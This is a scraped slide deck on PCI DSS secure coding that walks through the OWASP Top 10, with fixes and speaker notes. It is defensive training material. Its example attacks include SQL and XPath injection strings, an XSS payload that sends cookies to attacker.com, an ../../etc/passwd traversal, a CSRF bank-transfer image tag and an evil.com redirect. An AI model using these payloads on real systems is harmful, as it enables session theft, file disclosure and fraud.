Similar to PCI security requirements secure coding and code review 2014

OWASP Top 10 (2010 release candidate 1)
OWASP Top 10 (2010 release candidate 1)OWASP Top 10 (2010 release candidate 1)
OWASP Top 10 (2010 release candidate 1)
Jeremiah Grossman
 
Tips to Remediate your Vulnerability Management Program
Tips to Remediate your Vulnerability Management ProgramTips to Remediate your Vulnerability Management Program
Tips to Remediate your Vulnerability Management Program
BeyondTrust
 

Similar to PCI security requirements secure coding and code review 2014 (20)

ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
OWASP Top10 2010
OWASP Top10 2010OWASP Top10 2010
OWASP Top10 2010
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
Let's shield Liferay
Let's shield LiferayLet's shield Liferay
Let's shield Liferay
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
OWASP Top 10 (2010 release candidate 1)
OWASP Top 10 (2010 release candidate 1)OWASP Top 10 (2010 release candidate 1)
OWASP Top 10 (2010 release candidate 1)
 
Pci compliance writing secure code
Pci compliance writing secure codePci compliance writing secure code
Pci compliance writing secure code
 
Session4-Authentication
Session4-AuthenticationSession4-Authentication
Session4-Authentication
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Security Awareness
Security AwarenessSecurity Awareness
Security Awareness
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
Web application security I
Web application security IWeb application security I
Web application security I
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
Tips to Remediate your Vulnerability Management Program
Tips to Remediate your Vulnerability Management ProgramTips to Remediate your Vulnerability Management Program
Tips to Remediate your Vulnerability Management Program
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 

More from Haitham Raik

Advanced Hibernate V2
Advanced Hibernate V2Advanced Hibernate V2
Advanced Hibernate V2
Haitham Raik
 
IBM OOAD Part1 Summary
IBM OOAD Part1 SummaryIBM OOAD Part1 Summary
IBM OOAD Part1 Summary
Haitham Raik
 
Advanced Hibernate
Advanced HibernateAdvanced Hibernate
Advanced Hibernate
Haitham Raik
 

More from Haitham Raik (11)

History of Software Architecture
History of Software ArchitectureHistory of Software Architecture
History of Software Architecture
 
Unified Microservices Patterns List
Unified Microservices Patterns ListUnified Microservices Patterns List
Unified Microservices Patterns List
 
GIT In Detail
GIT In DetailGIT In Detail
GIT In Detail
 
Advanced Hibernate V2
Advanced Hibernate V2Advanced Hibernate V2
Advanced Hibernate V2
 
Red hat linux essentials
Red hat linux essentialsRed hat linux essentials
Red hat linux essentials
 
Object Oriented Analysis and Design with UML2 part2
Object Oriented Analysis and Design with UML2 part2Object Oriented Analysis and Design with UML2 part2
Object Oriented Analysis and Design with UML2 part2
 
Object Oriented Analysis and Design with UML2 part1
Object Oriented Analysis and Design with UML2 part1Object Oriented Analysis and Design with UML2 part1
Object Oriented Analysis and Design with UML2 part1
 
IBM OOAD Part1 Summary
IBM OOAD Part1 SummaryIBM OOAD Part1 Summary
IBM OOAD Part1 Summary
 
JEE5 New Features
JEE5 New FeaturesJEE5 New Features
JEE5 New Features
 
JMX
JMXJMX
JMX
 
Advanced Hibernate
Advanced HibernateAdvanced Hibernate
Advanced Hibernate
 

Recently uploaded

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformLess Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
WSO2
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization - The evolution of API governanceAPI Governance and Monetization - The evolution of API governance
API Governance and Monetization - The evolution of API governance
WSO2
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 

Recently uploaded (20)

Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Quantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingQuantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation Computing
 
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformLess Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Stronger Together: Developing an Organizational Strategy for Accessible Desig...
Stronger Together: Developing an Organizational Strategy for Accessible Desig...Stronger Together: Developing an Organizational Strategy for Accessible Desig...
Stronger Together: Developing an Organizational Strategy for Accessible Desig...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Choreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringChoreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software Engineering
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization - The evolution of API governanceAPI Governance and Monetization - The evolution of API governance
API Governance and Monetization - The evolution of API governance
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 

PCI security requirements secure coding and code review 2014

  • 1. PCI Security Requirements – Secure Coding & Code Review Tips Haitham Raik
  • 2. Overview  PCI DSS is a security standard that includes requirements for:  security management,  policies,  procedures,  network architecture,  software design and other critical protective measures  PCI DSS purpose: to help the organizations to protect customer account data.  This session doesn‟t cover all the security requirements.  This session covers only what has impact on our code.
  • 3. OWASP Top 10  OWASP top 10 educates developers, designers, managers, and organizations about the most important security risks.  OWASP top 10 provides basic techniques to protect against the high risk security problems.
  • 4. OWASP Top 10 - Injection  Injection flows, such as SQL, OS, Xpath, and LDAP injection occur when untrusted data is sent to an interpreter.  This data can trick the interpreter to execute unintended commands or accessing unauthorized data.  Threat Agents: anyone who can send data to the system.  Exploitability: Easy  Prevalence: Common  Detectability: Average  Impact: Severe
  • 5. OWASP Top 10 - Injection  SQL Injection Example:  String sqlString = "SELECT * FROM users WHERE fullname = '" + form.getFullName() + "' AND password = '" + form.getPassword() + "'";  Case 1: full name: Haitham, password: 123pass  Result: SELECT * FROM users WHERE username = „Haitham' AND password = '123pass'  Case 2: full name: Ala' Ahmad, password: 123pass  Result: SELECT * FROM users WHERE username = 'Ala' Ahmad' AND password = „13pass'  Case 3: full name: blah, password: ' OR '1' = '1  Result: SELECT * FROM users WHERE username = 'blah' AND password = '' OR '1' = '1'
  • 6. OWASP Top 10 - Injection  XPath Injection Example:  XML file: <?xml version="1.0" encoding="utf-8"?> <employees> <employee id="AS1" firstname="John" salary=“100"/> <employee id="AS2" firstname=“Adam“ salary=“200"/> </employees>  XPATH expression: String exp = “/employees/employee[@id=„”+form.getEID()+”']”  User Input: Emp_ID=‘ or '1'='1 Result: /employees/employee[@id=„‘ or '1'='1']
  • 7. OWASP Top 10 - Injection  Injection Protection:  The preferred option is to use a safe API which provides a parameterized interface. String stmt = “select * from emp where id=?”; PreparedStatement pstmt = con.prepareStatement(stmt); pstmt.setString(1, empId);  If a parameterized API is not available, escape the special characters. String exp = “/employees/employee[@id=„”+ ESAPI.encoder().encodeForXPath(form.getEID())+ ”']”  If special characters are not required in the input, then the white-list validation is also recommended.
  • 8. OWASP Top 10 - Injection  References:  https://www.owasp.org/index.php/SQL_Injection_Preventi on_Cheat_Sheet  https://www.owasp.org/index.php/Query_Parameterizatio n_Cheat_Sheet  https://www.owasp.org/index.php/Command_Injection  https://www.owasp.org/index.php/Testing_for_SQL_Injecti on_(OWASP-DV-005)
  • 9. OWASP Top 10 - Broken Authentication and Session Management  Functions related to authentication and session management are often not implemented correctly.  Allow attackers to compromise passwords, keys, or session tokens.  Threat Agents: anyone who may attempt to steal accounts from others to impersonate them.  Exploitability: Average  Prevalence: Widespread  Detectability: Average  Impact: Severe
  • 10. OWASP Top 10 - Broken Authentication and Session Management  Broken Authentication Examples:  Application supports URL re-writing, putting session IDs in the URL: http://example.com/sale/saleitems;jsessionid= 2P0OC2JSNDLPSKHCJUN2JV  if an authenticated user emailed the above link to his friends to see the sale, he will give also his session ID.  Application‟s timeout aren‟t set properly. User uses a public computer to access a site and forgot to logout.  User passwords are not hashed and internal attacker gains access to the password database.
  • 11. OWASP Top 10 - Broken Authentication and Session Management  Session Management Examples:  Session Hijacking attacks compromises the session token by stealing or predicting a valid session ID to gain unauthorized access.  Session ID can be compromised in different ways:  If application generates predictable session IDs (For example using sequencer).  Session Sniffing  XSS  Man in the middle attack  Man in the browser attack
  • 12. OWASP Top 10 - Broken Authentication and Session Management  Session Management Examples:  Application allow session fixation:
  • 13. OWASP Top 10 - Broken Authentication and Session Management  Authentication Recommendations:  Implement Proper Password Policy:  Minimum length should be enforced by application; shorter than 10 characters considered weak.  Application should enforce password complexity; at least 1 upper case char, at least 1 lowercase char, at least 1 digit and at least 1 special char.  Changing password should be EASY.  Store Passwords hashed using strong algorithm (SHA2).  Transmit passwords only over TLS.  Require Re-authentication for sensitive requests (This also protect against XSS and CSRF attacks)  for example: shipping a purchase requests.
  • 14. OWASP Top 10 - Broken Authentication and Session Management  More Authentication Recommendation:  Application must respond to failed login with generic message;  “Login Failed; Invalid UserID or password”  Application must prevent Brute-Force Attacks (prevent attacker to guess a password);  Account must be locked out if more than a preset number of failed logins are made.  Use a single authentication point.  Password must not be exposed in URL or hidden field.  Password autocomplete should always be disabled. <INPUT TYPE="password" AUTOCOMPLETE="off"> <form … AUTOCOMPLETE="off">
  • 15. OWASP Top 10 - Broken Authentication and Session Management  Session Protection Recommendations:  It is recommended to use JEE built-in session management. request.getSession();  Transmit session IDs only over TLS  Use Cookies for session ID exchange with following attributes:  Secure Attribute; instruct the browser to only send session Id over HTTPS jsessionid=2P0OC2JSNDLPSKHCJUN2JV;Secure  HTTPOnly Attribute; instruct the browser not to allow malicious scripts to access the cookies. jsessionid=2P0OC2JSNDLPSKHCJUN2JV;HTTPOnly  Domain and Path attributes; instruct the browser to only send the cookie to the specified domain and all sub-domains. jsessionid=2P0OC2JSNDLPSKHCJUN2JV;Domain=docs.foo.co m;Path=/accounts;
  • 16. OWASP Top 10 - Broken Authentication and Session Management  More Session Protection Recommendations:  Invalidate the Session ID after any privilege level change for the associated user. session.invalidate();  The session ID regeneration is mandatory to prevent session fixation attacks.  Set Session timeout:  2-5 minutes for high-value applications  15-30 minutes for low-value applications <web-app ...> <session-config> <session-timeout>20</session-timeout> </session-config> </web-app>
  • 17. OWASP Top 10 - Broken Authentication and Session Management  More Session Protection Recommendations:  Force session logout on browser close event using javascript window.addEventListener('unload', function() { var xhr = new XMLHttpRequest(); xhr.open('GET', „Logout.jsp', false); xhr.send(null); }, false);  Prevent simultaneous logons.
  • 18. OWASP Top 10 - Broken Authentication and Session Management  Detection:  User credentials aren‟t stored securely.  Session IDs/Passwords are exposed in the URL.  Session IDs/Passwords are exposed in hidden fields.  Session IDs don‟t timeout.  Session IDs aren‟t properly invalidated during logout.  Session IDs aren‟t rotated after successful login (this is required to prevent session fixation).  Passwords and session IDs are sent over unencrypted connections.  No lockout mechanism is implemented.  Browser offers to remember any account credentials.  Password is printed clear in the system logs.
  • 19. OWASP Top 10 - Broken Authentication and Session Management  References:  https://www.owasp.org/index.php/Authentication_Cheat_S heet  https://www.owasp.org/index.php/Session_Management_ Cheat_Sheet
  • 20. OWASP Top 10 – Cross-Site Scripting (XSS)  XSS occur whenever an application takes untrusted data and sends it to browser without proper validation or escaping.  XSS allows attackers to execute scripts in the victim‟s browser which can hijack user sessions or redirect the user to malicious sites.  Threat Agents: anyone who can send untrusted data to the system.  Exploitability: Average  Prevalence: Very Widespread  Detectability: Easy  Impact: Moderate
  • 21. OWASP Top 10 – Cross-Site Scripting (XSS)
  • 22. OWASP Top 10 – Cross-Site Scripting (XSS)  Examples:  Application uses untrusted data in the construction of HTML response: (String) page += "<input name='creditcard' type='TEXT„ value='" + request.getParameter("CC") + "'>"; The attacker modifies the „CC‟ parameter in his browser to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'. This causes the victim‟s session ID to be sent to the attacker‟s website.
  • 23. OWASP Top 10 – Cross-Site Scripting (XSS)  More XSS protection:  The preferred option is to properly escape all untrusted data based on the HTML context.  String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );  ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );  ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );  Whitelist input validation is also recommended; validation should validate the length, characters, format, and business rules.  For rich content, use auto-sanitization libraries like OWASP AntiSamy.  Use HTTPOnly & Secure attributes
  • 24. OWASP Top 10 – Cross-Site Scripting (XSS)  More XSS Protection:  Implement Content Security Policy; CSP is a browser side mechanism to create source whitelists for client side resources. Content-Security-Policy: default-src: 'self'; script-src: 'self' static.domain.tld  Browser will load all resources only from page‟s origin  Browser will load javascript only from page‟s origin and static.domain.tld
  • 25. OWASP Top 10 – Cross-Site Scripting (XSS)  References:  https://www.owasp.org/index.php/XSS_(Cross_Site_Scrip ting)_Prevention_Cheat_Sheet  https://www.owasp.org/index.php/Cross- site_Scripting_(XSS)  http://owasp-esapi- java.googlecode.com/svn/trunk_doc/latest/org/owasp/esa pi/Encoder.html  https://www.owasp.org/index.php/AntiSamy  https://www.owasp.org/index.php/Content_Security_Polic y
  • 26. OWASP Top 10 – Insecure Direct Object References  DOR occurs when a reference is exposed to an internal object, such as:  Directory, file, database key.  Without proper protection attacker can manipulate these references to access unauthorized data.  Threat Agents: authorized user who has partial access to certain functions.  Exploitability: Easy  Prevalence: Common  Detectability: Easy  Impact: Moderate
  • 27. OWASP Top 10 – Insecure Direct Object References  Examples:  The application uses unverified data in a SQL call that is accessing account information: String query = "SELECT * FROM accts WHERE account = ?"; PreparedStatement pstmt = connection.prepareStatement(query , … ); pstmt.setString( 1, request.getParameter("acct")); ResultSet results = pstmt.executeQuery( );  The attacker simply modifies the „acct‟ parameter to send whatever account number he wants http://example.com/app/accountInfo?acct=notmyacct
  • 28. OWASP Top 10 – Insecure Direct Object References  More Examples:  http://www.example.com/GetFile?fileName=image.jpg  What will happen if user manipulated with the above URL as following: http://www.example.com/GetFile?fileName=../../etc/passw d
  • 29. OWASP Top 10 – Insecure Direct Object References  DOS Prevention:  Use per session indirect object references.  This prevents attacker from directly targeting unauthorized resources.  Check access  Each use of a direct object reference must include and access control check.  Check access vs. Indirect object reference  Authorization:  May require an extra DB hit  Exposes actual ID  Indirect object reference  May not require an extra DB hit  Hides actual ID  Requires a bit of extra coding and some extra information  Not very popular
  • 30. OWASP Top 10 – Insecure Direct Object References  References:  https://www.owasp.org/index.php/Top_10_2007- Insecure_Direct_Object_Reference  http://cwe.mitre.org/data/definitions/22.html
  • 31. OWASP Top 10 – Security Misconfiguration  Security Misconfiguration occurs when default setup and configuration is used and no regular updates are performed on software.  Threat Agents: Anyone who want to compromise the system.  Exploitability: Easy  Prevalence: Common  Detectability: Easy  Impact: Moderate
  • 32. OWASP Top 10 – Security Misconfiguration  Recommendations:  Secure settings should be defined, implemented and maintained, as defaults are often insecure.  Perform regular updates on software
  • 33. OWASP Top 10 – Sensitive Data Exposure  Occur when sensitive data (such as credit card) are not properly protected.  Attackers may steal or modify such weakly protected data.  Threat Agents: Anyone who access to the sensitive data. This include data in DB, in transit, and even in users browser.  Exploitability: Difficult  Prevalence: Uncommon  Detectability: Average  Impact: SEVERE
  • 34. OWASP Top 10 – Sensitive Data Exposure  Examples:  A site doesn‟t use SSL for pages capture sensitive data.  Attacker monitors network traffic and steals the user‟s sensitive data.  The password database uses unsalted hashes to store passwords.  Attacker may use rainbow table of pre-calculated hashes to compromise the plain passwords.
  • 35. OWASP Top 10 – Sensitive Data Exposure  Recommendations:  Determine what is the data you want to protect.  Only store sensitive data that you need  Only use strong cryptographic algorithms; AES, RSASHA- 256  Ensure that random numbers are cryptographically strong  Java.security.SecureRandom  Store the passwords hashed and salted.  Define a key lifecycle.  Store Card numbers encrypted and/or Masked.  Use TLS for all login pages  Use TLS for channels transmitting sensitive data.  Don‟t mix non-TLS and TLS contents
  • 36. OWASP Top 10 – Sensitive Data Exposure  More Recommendations:  Use “Secure” Cookie flag  Keep sensitive data out of the URL  Prevent Caching of sensitive data:  Add HTTP response headers; "Cache-Control: no-cache, no- store“, "Expires: 0“, and "Pragma: no-cache“  Disable TLS compression  Use Fully Qualified Names in Certificates  Do Not Use Wildcard Certificates
  • 37. OWASP Top 10 – Sensitive Data Exposure  References:  http://en.wikipedia.org/wiki/Rainbow_table  https://www.owasp.org/index.php/Cryptographic_Storage _Cheat_Sheet  https://www.owasp.org/index.php/Password_Storage_Ch eat_Sheet  https://www.owasp.org/index.php/Transport_Layer_Protec tion_Cheat_Sheet
  • 38. OWASP Top 10 – Missing Function Level Access Control  With this threat, the attacker changes the URL to access a privileged pages.  Threat Agents: Anyone; authorized user or anonymous user.  Exploitability: Easy  Prevalence: Common  Detectability: Average  Impact: Moderate
  • 39. OWASP Top 10 – Missing Function Level Access Control  Examples:  User changes URL from: http://www.example.com/get_info  To: http://www.example.com/get_Admin_Info  A page provides an action parameter to specify the function being invoked and user changed the action value.
  • 40. OWASP Top 10 – Missing Function Level Access Control  Recommendations:  Ensure the access control matrix is part of the business, architecture, and design of the application  Ensure that all URLs and business functions are protected by centralized and effective access control mechanism.  For example by using a servlet filter the intercepts all incoming requests to verify if the user is authorized to access the requested page  Just because your URL is hard to guess, doesn‟t mean it can‟t be found!  Put your UI files under /WEB-INF
  • 41. OWASP Top 10 – Missing Function Level Access Control  More Recommendations:  Web applications should access the database through one or more limited accounts that do not have schema- modification privileges
  • 42. OWASP Top 10 – Cross-Site Request Forgery (CSRF)  CSRF: forces logged-in victim to send a request to a vulnerable web application.  Threat Agents: Anyone.  Exploitability: Average  Prevalence: Common  Detectability: Easy  Impact: Severe
  • 43. OWASP Top 10 – Cross-Site Request Forgery (CSRF)  Examples:  A hacker posts to a blog containing an image tag (blog site allows XSS):  <img src=“http://www.yourbank.com/transfer?to_acc=hacker_acc_nu m&amount=1000”/>  User logs into yourbank.com (session is active for user)  User visits the blog (without logging-out from yourbank.com)  Loading the image will send request to the bank site  The bank will transfer the user‟s money to hacker‟s account
  • 44. OWASP Top 10 – Cross-Site Request Forgery (CSRF)  Recommendations:  Make sure there are no XSS vulnerabilities in your application; refer to XSS protection slides.  Do not use GET requests to perform transactional operations.  For sensitive transactions, re-authenticate.  Add a confirmation page.  Use CAPTCHA  Insert custom random tokens into every form and URL  CSRF token must be different on each request or at least on each session.  Use CSRFTester tool; CSRFTester give developers the ability to test their applications for CSRF flaws
  • 45. OWASP Top 10 – Cross-Site Request Forgery (CSRF)  More Recommendations:  Do not use GET requests public void doGet(HttpServletRequest req, HttpServletResponse resp) { throw new Exception(“Invalid operation”); }
  • 46. OWASP Top 10 – Cross-Site Request Forgery (CSRF)  References:  https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet  https://www.owasp.org/index.php/CSRFGuard  https://www.owasp.org/index.php/CSRFTester
  • 47. OWASP Top 10 – Using Components with Known Vulnerabilities  Components, such as libraries, frameworks, and other software modules, almost always run with full privileges.  If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover  Threat Agents: Anyone.  Exploitability: Average  Prevalence: Widespread  Detectability: Difficult  Impact: Moderate
  • 48. OWASP Top 10 – Using Components with Known Vulnerabilities  Examples:  Apache CXF Authentication Bypass – By failing to provide an identity token, attackers could invoke any web service with full permission.  Struts Vulnerabilities: http://www.cvedetails.com/vulnerability-list/vendor_id- 45/product_id-6117/Apache-Struts.html
  • 49. OWASP Top 10 – Using Components with Known Vulnerabilities  Recommendations:  Identify all components and the versions you are using.  Monitor the security of these components in public databases; http://www.cvedetails.com/  Where appropriate, consider adding security wrappers around components to disable secure weak aspects of the component.  Always update the component to the latest version.
  • 50. OWASP Top 10 – Un-validated Redirects and Forwards  Web applications usually redirect users to other pages, and use untrusted data to determine the destination pages.  Without proper validation, attackers can redirect victims to phishing sites.  Threat Agents: Anyone who can trick your users.  Exploitability: Average  Prevalence: Uncommon  Detectability: Easy  Impact: Moderate
  • 51. OWASP Top 10 – Un-validated Redirects and Forwards  Examples:  The application has a page called “redirect.jsp” which takes a parameter named “url”.  The attacker emails to victim a malicious URL: http://www.example.com/redirect.jsp?url=evil.com
  • 52. OWASP Top 10 – Un-validated Redirects and Forwards  Recommendations:  Simply avoid using redirects.  If used to, don‟t involve user parameters to determine the destination.  If parameters can‟t be avoided, ensure that the supplied value is valid.  Applications can use ESAPI to override the sendRedirect() method to make sure all redirect destinations are safe.
  • 53. OWASP Top 10 – Un-validated Redirects and Forwards  References:  http://owasp-esapi- java.googlecode.com/svn/trunk_doc/latest/org/owasp/esa pi/filters/SecurityWrapperResponse.html#sendRedirect(ja va.lang.String)
  • 54.
  • 55. Improper error handling  Providing too much information to the user when an error occurs.  Examples:  An error message with too much detail  Stack trace  Failed SQL statement
  • 56. Improper error handling  Recommendation:  Write detailed error information to secure Log.  Configure an exception handler in the web.xml for all un- handled exceptions <error-page> <exception-type>java.lang.Throwable</exception-type> <location>/error.jsp</location> </error-page>
  • 57. ClickJacking  Clickjacking occurs when your site can be embedded into other sites.  Attacker can lead user to believe they are typing-in the password to their email, but are instead typing into an invisible frame hijacks your keystrokes.  To Prevent ClickJacking, you need to prevent your site from being embedded in iframes.  Use X-FRAME-OPTIONS header:  DENY  SAMEORIGIN  ALLOW-FROM uri
  • 58. Useful HTTP Response Headers Header Name Description Example Strict-Transport- Security Force every browser request to be sent over TLS/SSL Strict- Transport- Security: max- age=8640000; includeSubDo mains X-Frame- Options Provides Clickjacking protection X-Frame- Options: deny X-XSS- Protection This header enables the Cross-site scripting (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. X-XSS- Protection: 1; mode=block X-Content-Type- Options The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. X-Content- Type-Options: nosniff
  • 59. Useful HTTP Response Headers Header Name Description Example X-WebKit-CSP CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections. X-WebKit-CSP: default-src 'self'
  • 60. Useful HTTP Response Headers  Sample response from google.com: cache-control:private, max-age=0 content-encoding:gzip content-type:text/html; charset=UTF-8 date:Wed, 05 Mar 2014 11:21:10 GMT expires:-1 set-cookie:PREF=ID=3bb418586446f822; expires=Fri, 04-Mar-2016 11:21:10 GMT; path=/; domain=.google.com x-frame-options:SAMEORIGIN x-xss-protection:1; mode=block
  • 61. Useful Tools  Code Review Tools:  CodeCrawler  Orizon  O2  FindSecurityBugs: This is a plugin for FindBugs  Application Penetration Testing Tools:  WebScarab  ZAP

Editor's Notes

  1. Threat Agent can be external user, internal user and admins
  2. JDBC driver escape the dangers charactersESAPI is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applicationsEscape For SQL: Codec ORACLE_CODEC = new OracleCodec();String query = &quot;SELECT name FROM users WHERE id = &quot;+ESAPI.encoder().encodeForSQL(ORACLE_CODEC, userId)+ &quot; AND date_created &gt;= &apos;&quot;+ESAPI.encoder().encodeForSQL(ORACLE_CODEC, date)+ &quot;&apos;&quot;; myStmt = conn.createStatement(query);
  3. Session hijacking: - Predictable session key  use Build-in Session management to generate random and v. long key - Session Fixation Regenerate session id after login - Sniffing:  use Https - Steal the session key (XSS)  refer to XSSAll Cookies attributes can be set using IBM websphere Application Server Admin Console.HttpOnly is not supported by safari
  4. XSS and Injection flaws are similar in the concept; XSS for browsers while injection for data sources
  5. DOR can’t be detected by automatic tools; it can be detected by manual code review and manual testing
  6. Showing the same error message with different codes is another type of leaking the information
  7. Secure Log means, only authorized people can see its content